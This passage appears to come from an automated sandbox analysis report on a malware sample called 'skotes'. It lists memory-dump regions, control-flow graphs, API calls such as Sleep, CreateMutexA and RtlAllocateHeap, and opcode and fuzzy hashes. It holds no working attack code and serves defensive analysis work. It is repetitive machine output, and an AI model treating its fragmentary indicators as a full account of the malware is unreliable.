                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: c525dd2993c4d26789fb266034ee8067be2a7e14609fbf0c3b12471ca54a3078
                                                                                                                                                                • Instruction ID: 216fefc7d75b6525037503784062802aecf1dcca86352da03d1afdd4db925f23
                                                                                                                                                                • Opcode Fuzzy Hash: c525dd2993c4d26789fb266034ee8067be2a7e14609fbf0c3b12471ca54a3078
                                                                                                                                                                • Instruction Fuzzy Hash: 9F2138716482019BFB2477A89C9A76DB3D2DB81304F2448E7E144D72F1DE659881C3A3

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 292 b8a34f-b8a35b 293 b8a35d-b8a36b 292->293 294 b8a371-b8a39a call b9d663 292->294 293->294 295 b8a93a 293->295 300 b8a3c8-b8a916 call b980c0 294->300 301 b8a39c-b8a3a8 294->301 297 b8a953-b8a994 Sleep CreateMutexA 295->297 298 b8a93a call bb6c6a 295->298 307 b8a996-b8a998 297->307 308 b8a9a7-b8a9a8 297->308 298->297 304 b8a3aa-b8a3b8 301->304 305 b8a3be-b8a3c5 call b9d663 301->305 304->295 304->305 305->300 307->308 310 b8a99a-b8a9a5 307->310 310->308
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 0e92126eb4375c225bb3e6777fd41c85954ac89f645bb3172d3c3ddd452668b2
                                                                                                                                                                • Instruction ID: ec3d482623e7dea1855faa30555db75e006d9ec1fd3c75b9d81788a73778b192
                                                                                                                                                                • Opcode Fuzzy Hash: 0e92126eb4375c225bb3e6777fd41c85954ac89f645bb3172d3c3ddd452668b2
                                                                                                                                                                • Instruction Fuzzy Hash: CF212C317042009BFB18AB68DC8576DB7E2DBD6314F2442AAE444D77E4DB75A980C352

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 351 bbd82f-bbd83a 352 bbd848-bbd84e 351->352 353 bbd83c-bbd846 351->353 355 bbd850-bbd851 352->355 356 bbd867-bbd878 RtlAllocateHeap 352->356 353->352 354 bbd87c-bbd887 call bb75f6 353->354 360 bbd889-bbd88b 354->360 355->356 357 bbd87a 356->357 358 bbd853-bbd85a call bb9dc0 356->358 357->360 358->354 364 bbd85c-bbd865 call bb8e36 358->364 364->354 364->356
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BBA813,00000001,00000364,00000006,000000FF,?,00BBEE3F,?,00000004,00000000,?,?), ref: 00BBD870
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 6eb750a579d91d073ea78af390e4bc17187c6d59baf99005634b16deda9d9e4b
                                                                                                                                                                • Instruction ID: c513f3dc025f75e4ff6671895233da32ff5b84fc2294daf7b9ee6102af7a91ab
                                                                                                                                                                • Opcode Fuzzy Hash: 6eb750a579d91d073ea78af390e4bc17187c6d59baf99005634b16deda9d9e4b
                                                                                                                                                                • Instruction Fuzzy Hash: 30F02E3264512467EB312A72DC01AFB37D9DF81771B1480E1FD04AB191FEE8EC0086E0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 32384418-0
                                                                                                                                                                • Opcode ID: ba02cf42efdb50bba720da3dcc3c5198f820d3355a3b35de5daa03d6310dce39
                                                                                                                                                                • Instruction ID: 479942cec0709f1bc4d82de2cc2f664afcf6444646442ed74ecc6295583c01ea
                                                                                                                                                                • Opcode Fuzzy Hash: ba02cf42efdb50bba720da3dcc3c5198f820d3355a3b35de5daa03d6310dce39
                                                                                                                                                                • Instruction Fuzzy Hash: 9EA1C1B0A052059FDF11EF65C948B5ABBF8FF15B10F0481BAE815D72A1EB35EA04CB91
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
